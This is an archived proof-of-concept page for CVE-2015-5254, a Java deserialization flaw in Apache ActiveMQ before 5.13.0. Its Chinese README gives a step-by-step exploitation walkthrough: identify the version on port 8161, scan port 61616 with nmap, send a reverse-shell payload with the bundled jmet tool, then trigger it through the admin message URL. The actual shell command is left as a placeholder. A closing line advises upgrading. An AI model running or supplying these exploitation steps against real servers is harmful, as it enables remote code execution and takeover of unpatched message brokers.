Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2015-5254 PoC — Apache ActiveMQ 输入验证错误漏洞

Source
Associated Vulnerability
Title:Apache ActiveMQ 输入验证错误漏洞 (CVE-2015-5254)
Description:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前的5.x版本中存在输入验证错误漏洞。该漏洞源于网络系统或产品未对输入的数据进行正确的验证。
Description
ActiveMQ_CVE-2015-5254
Readme
ActiveMQ反序列化(CVE-2015-5254)

漏洞描述:Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

影响版本:Apache ActiveMQ 5.13.0之前的5.x版本

0x01	登陆后台确定版本:
http://IP:8161

![Image text](https://github.com/gsheller/ActiveMQ_CVE-2015-5254/blob/master/images/version.jpg)

0x02	确定61616端口开放:
nmap -sV -Pn -T4 -sC -p 61616 IP
![Image text](https://github.com/gsheller/ActiveMQ_CVE-2015-5254/blob/master/images/61616.jpg)

0x03	发送反弹payload:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "xxx" -Yp ROME IP 61616
![Image text](https://github.com/gsheller/ActiveMQ_CVE-2015-5254/blob/master/images/反弹shell.jpg)

0x04	点击触发Browse event-Message ID  ,成功反弹:
http://IP:8161/admin/message.jsp?id=ID&JMSDestination=event
![Image text](https://github.com/gsheller/ActiveMQ_CVE-2015-5254/blob/master/images/成功反弹.jpg)

修复建议:升级到最新版本,配置waf相关规则进行拦截
File Snapshot

[4.0K] /data/pocs/8c90ab8b85e16fbd9404edaef2bd91a38054035b ├── [4.0K] images │   ├── [ 65K] 61616.jpg │   ├── [ 79K] version.jpg │   ├── [634K] 反弹shell.jpg │   └── [205K] 成功反弹.jpg ├── [ 55M] jmet-0.1.0-all.jar └── [1.2K] README.md 1 directory, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.